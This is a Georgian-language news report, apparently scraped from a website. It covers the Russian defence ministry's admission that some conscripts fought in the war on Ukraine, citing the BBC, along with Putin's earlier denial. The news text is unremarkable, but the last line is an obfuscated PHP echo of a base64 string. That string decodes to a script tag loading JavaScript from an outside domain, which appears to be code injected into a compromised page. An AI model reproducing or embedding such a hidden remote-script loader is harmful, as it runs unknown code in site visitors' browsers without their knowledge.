celsiusi
ავერსი საქკაბელი
რუსეთის თავდაცვის სამინისტრომ აღიარა, რომ ზოგიერთი წვევამდელი ჯარისკაცი, რომელიც ომში იძულებით წაიყვანეს, მონაწილეობს რუსეთის უკრაინაზე თავდასხმაში. ამის შესახებ BBC-ი წერს.
 
რუსეთის თავდაცვის სამინისტრომ აღნიშნა, რომ რამდენიმე რუსი წვევამდელი უკრაინულმა შეიარაღებულმა ძალებმა დაატყვევეს.
 
„სამწუხაროდ, უკრაინაში მიმდინარე სპეცოპერაციაში ჩვენ რამდენიმე წვევამდელის ყოფნის ფაქტი აღმოვაჩინეთ. პრაქტიკულად ყველა ასეთი ჯარისკაცი უკვე გაყვანილია“, - აცხადებს რუსეთის თავდაცვის სამინისტრო და პირობას დებს, რომ მსგავსი ფაქტის განმეორებას თავიდან აიცილებს.
 
შეგახსენებთ, რამდენიმე დღის წინ რუსეთის პრეზიდენტმა, ვლადიმირ პუტინმა უარყო უკრაინაში მიმდინარე ომში წვევამდელი ჯარისკაცების ჩართვის შესახებ გავრცელებული ინფორმაცია და განაცხადა, რომ უკრაინის კონფლიქტში მხოლოდ პროფესიონალი ჯარისკაცები იღებენ მონაწილეობას.
 
ცნობისთვის, რუსეთში 18-დან 27 წლამდე ყველა მამაკაცი, გამონაკლისების გარდა, ვალდებულია გაიაროს ერთწლიანი სამხედრო სამსახური.
724
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");